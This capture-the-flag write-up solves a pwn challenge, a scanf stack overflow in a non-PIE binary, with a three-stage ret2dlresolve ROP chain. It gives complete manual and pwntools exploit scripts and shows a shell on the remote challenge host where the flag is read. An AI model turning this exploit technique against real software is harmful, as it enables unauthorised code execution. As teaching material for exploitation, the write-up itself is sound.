BOF that's too ez
15 minutes to read
We are given a 64-bit binary called chall_patched
:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
We also have the Glibc library and loader. We are dealing with version 2.36:
$ ./ld-linux-x86-64.so.2 ./libc.so.6
GNU C Library (Debian GLIBC 2.36-9) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
Source code analysis
This time we also have the source code. And, to be honest, there is not much to say about it:
// gcc main.c -fno-stack-protector -fno-pic -no-pie -o chall
#include <stdio.h>
__attribute__( ( constructor ) ) void init() {
setvbuf( stdin, NULL, _IONBF, NULL );
setvbuf( stdout, NULL, _IONBF, NULL );
setvbuf( stderr, NULL, _IONBF, NULL );
}
int main( void ) {
char buf[0x10] = { 0 };
scanf( "%s", buf );
return 0;
}
So, we have a clear Buffer Overflow vulnerability because the buffer data
has only 16 bytes reserved, but scanf("%s", data)
will not check bounds and simply write until it finds a newline character or a whitespace.
Exploitation
So, Buffer Overflow. Easy, right? Not quite because we have plenty of limitations. For instance, we would like to use Return-Oriented Programming (ROP) because the NX doesn’t allow us to execute shellcode on the stack. However, we have only a few usable ROP gadgets:
$ ROPgadget --binary chall_patched
Gadgets information
============================================================
0x00000000004010cb : add bh, bh ; loopne 0x401135 ; nop ; ret
0x000000000040109c : add byte ptr [rax], al ; add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401035 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401020
0x00000000004011ee : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x00000000004011ef : add byte ptr [rax], al ; add cl, cl ; ret
0x000000000040113a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040109e : add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401037 : add byte ptr [rax], al ; jmp 0x401020
0x00000000004011f0 : add byte ptr [rax], al ; leave ; ret
0x000000000040100d : add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x000000000040113b : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004011f1 : add cl, cl ; ret
0x00000000004010ca : add dil, dil ; loopne 0x401135 ; nop ; ret
0x0000000000401045 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401137 : add eax, 0x2f0b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401017 : add esp, 8 ; ret
0x0000000000401016 : add rsp, 8 ; ret
0x00000000004010c8 : and byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401135 ; nop ; ret
0x00000000004011b7 : call qword ptr [rax + 0xff3c35d]
0x0000000000401014 : call rax
0x0000000000401153 : cli ; jmp 0x4010e0
0x0000000000401033 : cli ; push 0 ; jmp 0x401020
0x0000000000401043 : cli ; push 1 ; jmp 0x401020
0x00000000004010a3 : cli ; ret
0x00000000004011f7 : cli ; sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401150 : endbr64 ; jmp 0x4010e0
0x0000000000401030 : endbr64 ; push 0 ; jmp 0x401020
0x0000000000401040 : endbr64 ; push 1 ; jmp 0x401020
0x00000000004010a0 : endbr64 ; ret
0x0000000000401012 : je 0x401016 ; call rax
0x00000000004010c5 : je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401107 : je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x0000000000401039 : jmp 0x401020
0x0000000000401154 : jmp 0x4010e0
0x000000000040103d : jmp qword ptr [rsi - 0x70]
0x00000000004010cc : jmp rax
0x00000000004011f2 : leave ; ret
0x00000000004010cd : loopne 0x401135 ; nop ; ret
0x0000000000401136 : mov byte ptr [rip + 0x2f0b], 1 ; pop rbp ; ret
0x00000000004011ed : mov eax, 0 ; leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x00000000004011b8 : nop ; pop rbp ; ret
0x00000000004010cf : nop ; ret
0x000000000040114c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010e0
0x00000000004010c6 : or dword ptr [rdi + 0x404020], edi ; jmp rax
0x0000000000401138 : or ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040113d : pop rbp ; ret
0x0000000000401034 : push 0 ; jmp 0x401020
0x0000000000401044 : push 1 ; jmp 0x401020
0x000000000040101a : ret
0x0000000000401161 : retf
0x0000000000401022 : retf 0x2f
0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x000000000040100b : shr dword ptr [rdi], 1 ; add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x00000000004011f9 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004011f8 : sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
0x00000000004010c3 : test eax, eax ; je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401105 : test eax, eax ; je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax
Unique gadgets found: 61
ROP gadgets
I’ll highlight those that can be useful:
0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401039 : jmp 0x401020
0x00000000004011f2 : leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x000000000040113d : pop rbp ; ret
0x000000000040101a : ret
See? We don’t have the classic pop rdi; ret
gadget. We can’t even control the content of $rdi
, we are forced to use 0x404020
!
Also notice that we can only set arbitrary values in $rbp
. Well, we can also control $rsp
because the leave
instruction is just mov rsp, rbp; pop rbp
.
Hence, the first gadget could be really useful if we can control $rbx
, because we would get a kind of write-what-where primitive. But it looks hard to control $rbx
.
Looking to the assembly code, I found some other instructions that can be really handy:
00000000004011bb <main>:
4011bb: f3 0f 1e fa endbr64
...
4011d7: 48 8d 45 f0 lea rax,[rbp-0x10]
4011db: 48 89 c6 mov rsi,rax
4011de: bf 04 20 40 00 mov edi,0x402004
4011e3: b8 00 00 00 00 mov eax,0x0
4011e8: e8 73 fe ff ff call 401060 <_init+0x60>
4011ed: b8 00 00 00 00 mov eax,0x0
4011f2: c9 leave
4011f3: c3 ret
With this section of main
, we can control $rax
and therefore $rsi
, before calling scanf
. Notice that $rax = 0
afterwards, so we don’t end up with $rax
control. Also, while debugging, it looks like scanf
sets some value to $rsi
we can’t control properly, so it is also useless.
But the relevant thing is that we can control where to write with scanf
! That is, we write to the address at $rbp + 0x10
. But be careful, because the leave; ret
will cause a Stack Pivot!
The init
function also contains useful instructions:
0000000000401156 <init>:
401156: f3 0f 1e fa endbr64
...
40119a: 48 8b 05 9f 2e 00 00 mov rax,QWORD PTR [rip+0x2e9f] # 404040 <stderr@GLIBC_2.2.5>
4011a1: b9 00 00 00 00 mov ecx,0x0
4011a6: ba 02 00 00 00 mov edx,0x2
4011ab: be 00 00 00 00 mov esi,0x0
4011b0: 48 89 c7 mov rdi,rax
4011b3: e8 98 fe ff ff call 401050 <_init+0x50>
...
This part corresponds to setvbuf(stderr, NULL, _IONBF, NULL)
. We can also find the equivalent with stdin
(0x404030
) and stdout
(0x404020
). Therefore, we can also choose $rdi
to be 0x404040
or 0x404030
.
Last but not least, these sections will be highly relevant for the exploit I came up with:
0000000000401020 <.plt>:
401020: ff 35 ca 2f 00 00 push QWORD PTR [rip+0x2fca] # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: ff 25 cc 2f 00 00 jmp QWORD PTR [rip+0x2fcc] # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
40102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
401030: f3 0f 1e fa endbr64
401034: 68 00 00 00 00 push 0x0
401039: e9 e2 ff ff ff jmp 401020 <_init+0x20>
40103e: 66 90 xchg ax,ax
401040: f3 0f 1e fa endbr64
401044: 68 01 00 00 00 push 0x1
401049: e9 d2 ff ff ff jmp 401020 <_init+0x20>
40104e: 66 90 xchg ax,ax
Disassembly of section .plt.sec:
0000000000401050 <.plt.sec>:
401050: f3 0f 1e fa endbr64
401054: ff 25 a6 2f 00 00 jmp QWORD PTR [rip+0x2fa6] # 404000 <setvbuf@GLIBC_2.2.5>
40105a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
401060: f3 0f 1e fa endbr64
401064: ff 25 9e 2f 00 00 jmp QWORD PTR [rip+0x2f9e] # 404008 <__isoc99_scanf@GLIBC_2.7>
40106a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
Also, notice that the only functions we can use are setvbuf
and scanf
. There is no function that prints information to stdout
! Therefore, we must come up with a leakless exploit!
ret2dlresolve
Every time there are not many useful gadgets and we don’t see a way to leak memory addresses to bypass ASLR, we can rely on ret2dlresolve.
This technique abuses how dynamically-linked programs resolve external function addresses at runtime. With this technique, we can tell the program to resolve the address of system
, so we don’t have to care about ASLR.
There are not many resources out there that explain this attack in depth, especially for the x86_64 architecture. I’ll link some of them here:
- ret2dl_resolve x64: Exploiting Dynamic Linking Procedure In x64 ELF Binaries
- ROP之return to dl-resolve (in Chinese)
- Boosting your ROP skills with SROP and ret2dlresolve - Giulia Martino - HackTricks Track 2023
- Temple Of Pwn 12 - Ret2DlResolve
In brief, we need to fake some structures and craft offsets and indices so that the _dl_runtime_resolve
routine is able to find the function name, resolve the expected function in Glibc and write its real address where we want to.
Source: https://syst3mfailure.io/ret2dl_resolve/
The above image perfectly shows the process of calling an external function, in the above example, read
:
- The
main
function callsread
at the .plt section - The .plt section jumps directly to the .got.plt section
- If the function is not resolved yet, the .got.plt holds an address back to the .plt
- The program pushes the
reloc_arg
number and jumps to the default .plt stub - This stub pushes the
link_map
address and calls_dl_runtime_resolve
On this process, we can mess around with reloc_arg
number, because it is passed to _dl_runtime_resolve
on the stack. We will need to learn how they work in order to come up with a successful ret2dlresolve exploit.
There are three relevant sections used by the linker to resolve addresses:
JMPREL
(.rela.plt) is a table ofElf64_Rel
structures (size0x18
). Each structure containsr_offset
,r_info
and padding. Both of the attributes are relevant, becauser_offset
holds the address where the relocation address will be written to, andr_info
will be used to locate the correspondingElf64_Sym
structure inDYNSYM
.DYNSYM
(.dynsym) contains a table ofElf64_Sym
structures (size0x18
). The relevant field of this structure isst_name
, which contains the index of the symbol name inSTRTAB
.STRTAB
(.dynstr) is just a list of symbol names all together, separated by a null byte.
Implementation
Let’s jump directly into the ret2dlresolve exploit code:
align = lambda alignment, addr: addr + (- addr % alignment)
JMPREL = 0x4005e0 # .rela.plt section
SYMTAB = 0x3fe450 # .symtab section
STRTAB = 0x3fe510 # .strtab section
dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'
fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18
st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0
elf64_sym = p32(st_name) + p8(st_value) + p8(st_size) + p16(st_info) + p64(st_other) + p64(st_shndx)
index = align(0x18, fake_symtab - SYMTAB) // 0x18
r_offset = setvbuf_got_addr
r_info = (index << 32) | 7
elf64_rel = p64(r_offset) + p64(r_info) + p64(0)
reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18
dlresolve_payload = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel
First of all, I define the align
function in order to fit structures with a 0x18
-byte alignment. Then I define the relevant sections according to the binary:
$ readelf --sections chall_patched | egrep "Name|.rela.plt|.dynsym|.dynstr"
[Nr] Name Type Address Offset
[ 6] .dynsym DYNSYM 00000000003fe450 00000450
[ 7] .dynstr STRTAB 00000000003fe510 00000510
[12] .rela.plt RELA 00000000004005e0 000025e0
After that, I choose the address where I will store the payload and the symbol I want to resolve:
dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'
With this, I can start crafting fake structures. But let’s go to the end for a second:
dlresolve_payload = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel
In short, the dlresolve_payload
is just a fake STRTAB
, a fake DYNSYM
and a fake JMPREL
. This payload will be located at dlresolve_payload_addr = 0x404e00
(in the .bss section, which is writable):
fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18
Now, we need to find a value for reloc_arg
and the attributes of the fake structures.
First of all, the fake SYMTAB
section, that contains an Elf64_Sym
structure:
st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0
elf64_sym = p32(st_name) + p8(st_value) + p8(st_size) + p16(st_info) + p64(st_other) + p64(st_shndx)
There is an index computed from this address, as a distance between the legitimate and fake SYMTAB
sections:
index = align(0x18, fake_symtab - SYMTAB) // 0x18
This index will be present at the r_info
attribute of the fake Elf64_Rel
structure, at the fake JMPREL
section:
r_offset = setvbuf_got_addr
r_info = (index << 32) | 7
elf64_rel = p64(r_offset) + p64(r_info) + p64(0)
Finally, the reloc_arg
number is computed as a distance between the legitimate and fake JMPREL
sections:
reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18
Did you notice that r_offset
is set to the address of setvbuf
at the GOT? Yes, we want the address of system
to be written there. If so, we can call the address we saw earlier at the init
function, in order to control $rdi
into some address of 0x404020
, 0x404030
and 0x404040
. Therefore, we will need to write "/bin/sh\0"
here.
Let’s write here some ROP gadget addresses and other addresses required for the exploit:
pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2
jmp_plt_addr = 0x401039
setvbuf_got_addr = 0x404000
stderr_got_addr = 0x404040
bin_sh_addr = 0x404048
call_setvbuf_addr = 0x40119a
I don’t know how to explain this better than showing the code:
io = get_process()
stage1 = p64(pop_rbp_ret_addr)
stage1 += p64(stderr_got_addr + 0x10)
stage1 += p64(context.binary.sym.main + 28)
io.sendline(b'A' * 24 + stage1)
In this stage, we set the value of $rbp
to the address of stderr
(0x404040
) plus 0x10
. We do this because $rax
will have the value of $rbp - 0x10
, executed at *main+27
(lea rax, [rbp-0x10]
). Hence, we will be running scanf
at the address of stderr
(0x404040
).
stage2 = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)
io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)
First of all, we will take advantage of the junk length to exploit the Buffer Overflow, to insert here the string "/bin/sh\0"
and its address (before the string). We need this for the end, because setvbuf
will be called on the address pointed to by stderr
(that is, it is not 0x404040
, but 0x404048
at this point).
The second stage will execute from here because at the end of main
there is a leave; ret
, so we are effectively performing a Stack Pivot. This means that $rsp
now points to the .bss, specifically, to 0x404058
. Now we do the same trick of setting $rbp
to be able to write at a desired address with scanf
.
We will start writing above dlresolve_payload_addr
because we need the stack to be safe when doing the ret2dlresolve stuff. We are doing another leave; ret
to rebase $rsp
to the current value of $rbp
(which is 0x70
bytes above dlresolve_payload_addr
). This is the reason of the 0xd20
-byte padding:
$ python3 -q
>>> hex((0x404e00 - 0x80 + 0x10) - (0x404040 + 0x30))
'0xd20'
After the padding, we enter again the address of dlresolve_payload_addr - 0x80 + 0x10
(to set it to $rbp
with the leave; ret
gadget) and then the address of main
to call scanf
controlling $rax
and $rsi
. The program flow will jump here again, so we will be able to write at this address our third stage:
stage3 = p64(jmp_plt_addr)
stage3 += p64(reloc_arg)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve_payload
io.sendline(b'A' * 24 + stage3)
This last stage will write 0x18
bytes of Buffer Overflow junk and then the address of an instruction jmp 0x401020
. We cannot use 0x401020
directly because 0x20
is a whitespace in hexadecimal, and scanf
would stop reading. Then, we push the reloc_arg
for the ret2dlresolve exploit. After that, we enter the address to set $rdi = 0x404040
and call setvbuf
(this will happen after the relocation process).
Finally, we add some more padding to fit in 0x80
bytes (0x18 + 0x18 + 0x50
) and write dlresolve_payload
.
With all this, we will get a shell, both locally and on the local Docker container:
$ python3 solve_manual.py
[*] './chall_patched'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
[+] Starting local process './chall_patched': pid 3272010
[*] Switching to interactive mode
$ whoami
rocky
Using pwntools
If you noticed, the script is called solve_manual.py
. That’s because I wrote another exploit called solve_pwntools.py
that abstracts all the ret2dlresolve stuff. Here it is:
pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2
bin_sh_addr = 0x404048
jmp_plt_addr = 0x401039
call_setvbuf_addr = 0x40119a
dlresolve = Ret2dlresolvePayload(
context.binary,
symbol='system',
args=[],
resolution_addr=context.binary.got.setvbuf,
)
io = get_process()
stage1 = p64(pop_rbp_ret_addr)
stage1 += p64(context.binary.got.stderr + 0x10)
stage1 += p64(context.binary.sym.main + 28)
io.sendline(b'A' * 24 + stage1)
stage2 = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)
io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)
stage3 = p64(jmp_plt_addr)
stage3 += p64(dlresolve.reloc_index)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve.payload
io.sendline(b'A' * 24 + stage3)
io.interactive()
Obviously, it is not as exciting as solve_manual.py
, but it does look more friendly.
Flag
With any of the exploits, we can get a shell on the remote instance and capture the flag:
$ python3 solve_manual.py 0.cloud.chals.io 26418
[*] './chall_patched'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
[+] Opening connection to 0.cloud.chals.io on port 26418: Done
[*] Switching to interactive mode
$ cat /flag*
HackOn{th4t_w4s_4_fr33_BOF_4_y0u_6c6415857decc41b8d9366be69ab68cc}
The full exploits can be found in here: solve_manual.py
and solve_pwntools.py
.